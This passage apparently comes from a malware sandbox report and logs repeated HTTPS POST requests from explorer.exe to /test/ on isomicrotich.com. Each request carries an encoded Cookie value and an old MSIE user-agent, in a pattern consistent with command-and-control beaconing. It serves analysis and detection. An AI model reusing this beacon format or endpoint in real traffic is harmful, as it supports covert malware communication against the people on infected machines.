                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18eea9178c60-EWR
2024-10-03 18:46:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 62296 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:53 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:53 UTC | 573 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:53 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hqAk%2BVhXn61Uex4%2B41u%2Bf2C9sGQs9rs4c5zDcCsqdBMs6uOcTyjXyv1OHOZZwuqnLXWRd%2FMB6lyQBkfL95NC1zZkSvKpcSsR3s5eQI67K%2F87O%2BsPQjH%2FlvG4O3U0uxBbZcwK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18f86a2e8c75-EWR
2024-10-03 18:46:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 62297 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:54 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:54 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:54 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zu%2BviSj6EQF6LUHz5e6jeyAvLBmCB%2FMHmzPQL2yZcXvFbfxkfEt7k2KsuC5OVFq4ho3TQpXfr%2FvrgdEQHbads%2FmdWHTTC6vjSaPJmZKpurhUKuF9QEw783UOO4j2%2FjrVBlnr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf18fefb504263-EWR
2024-10-03 18:46:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 62300 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:56 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:57 UTC | 536 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:57 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACLu3E884Qd9mCfxTmcBLI1ksHeIppE3PslEhKTkwZX2avIcKKNdZ2L3FFezlE8p4yc5RzFS0vr1uFYHesFXlq7zrcwmls79k49IYZRhhzFf5G2wSzcF7rZMNL8lh6iRGY4Q"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19095bb51780-EWR
2024-10-03 18:46:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 62304 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:57 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:58 UTC | 567 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:58 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c3ygFduRqc6pJS1Sz4cLEEVF88qfBMI540h9zliDszEzTGa2XwdVTzQ9l%2F8ek2qL1bPqGN9MF7E14p4QbzDqGDWTr5%2FxMzA9d6%2FE%2FIGSxeAdsYigESY1k7TMIvE5Jp069XPI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1913095a0f78-EWR
2024-10-03 18:46:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.7 | 62306 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:58 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:46:59 UTC | 567 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:46:59 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMyZmhnhnN9iruILt%2BByXu8sigSMqeGAL1ufPz4%2BTtKecnWIcrnsHU4ny9SWWEw2PI3Fg9hWzoPyyWCJwWJ96F0VEfc5IFzA7Vr2cAOwtamb%2BoQean5SpCAV4qzP8rnk8%2FYZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1919a9f0c33e-EWR
2024-10-03 18:46:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.7 | 62307 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:46:59 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:00 UTC | 542 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:00 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CWJaer5hKLrDkOhn%2FHfULBBdgYu3THwh0hvMakflpL6Q6YZ8eX8H%2FZrBlXv1Mr55a5734OWNWdomcf0N0OWUV0DPuJbDyTZFTMKJLFEJAEPlwFcgNTPESqAs6%2FnZfqspdWDl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19201c7e7cf3-EWR
2024-10-03 18:47:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.7 | 62308 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:00 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFj6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:01 UTC | 565 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:01 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mla5Lno219m9XgbQ%2FexwnL4JiI4K7KPf4WPUmX%2ForaK7UuQvQAkGEFAc2fo4npEpULDure6gtag7h4AT6tiN0UehXYYBtz%2ByxmdIbFTIYAiVtoz8PX0nzs50adnSonGIq67v"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19271eca41ad-EWR
2024-10-03 18:47:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.7 | 62310 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:01 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:02 UTC | 565 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:02 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KcJs%2BB33SimoMmUkVU0lfynnUbSNkMyOWtuysAB%2F6K3uc0v5ywRXjH5izibXtPoNF66uFZhuzo7ebBFyiXgfW1UmAPmoJt7VDBGc0V%2BeSTWnpNhwXK3dWjBS5YqTfKrto5Gn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf192d0ed40f79-EWR
2024-10-03 18:47:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.7 | 62313 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:03 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:03 UTC | 550 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:03 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kk3vr%2BH090EhxCvRPAm0RSrlpYT1Z74dNMPz9UepCraFCK%2BavHymcHr72%2Bk%2FqVKZzbsqwbnEIhIF%2FPeD9uQeqrMfOpLm5XtbQZbx%2BlrLEv8Ia7R1anv%2BHX7DLilM33C8tAKQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19361b974405-EWR
2024-10-03 18:47:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 62314 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:04 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:04 UTC | 567 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:04 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cI%2FSQTzb5DC0rioZ3K05%2Fl9jmOkANRLP3gl3pK2cQw24yv9q8xK5CjG6fbUYMXdbUSce5E95KSJKjjSskByjEMYQlX7tvLawBBgcM9C85lKl%2FnZevZ5jNYjuAhC%2F2FbdmKLW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf193d4dab4386-EWR
2024-10-03 18:47:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 62315 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:05 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:06 UTC | 548 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:06 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SFIsRDZVAYgnj89Y2%2Bgdz2u1TMDgUhc932l8ymKk30qiXNkvLhfvZTH%2Fg90fbSOd4kOEfFqtmmQPA%2F%2FrHCm9%2FjrvXG5q3Yh7T5JkjKC3xE98lk0%2Fh6O5O3TxnFUkfAE2XPzk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19450ece42af-EWR
2024-10-03 18:47:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 62318 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:07 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:07 UTC | 565 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:07 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uEswb6VaIjZO%2FjdBFKM45lq0fkgwLfyjunSaiLSrvdDrV0YgrEVS36W7SnTnL7EZ2zJ6R50TEgtESsvmZ%2Fo6Sg3bAvaRy0VT0cj6oon60HHmXNp57BhuPhBdgi6fCE%2FPvst8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf194ebeca8c2f-EWR
2024-10-03 18:47:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 62320 | 188.114.97.3 | 443 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 18:47:08 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFi5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-10-03 18:47:08 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bVd38BqjR4cZYrcXtWOjGQaBennIQ48d5w5U%2Fhrgywuto7WkXIkTG7o28Edmg3UdSI%2Fh7lWx9Sgwf7CdrR1pGdMx%2FGahc1Bn2md9wJ1NfdM%2FItT7D7rWQj1705xKI%2BPqwFQa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
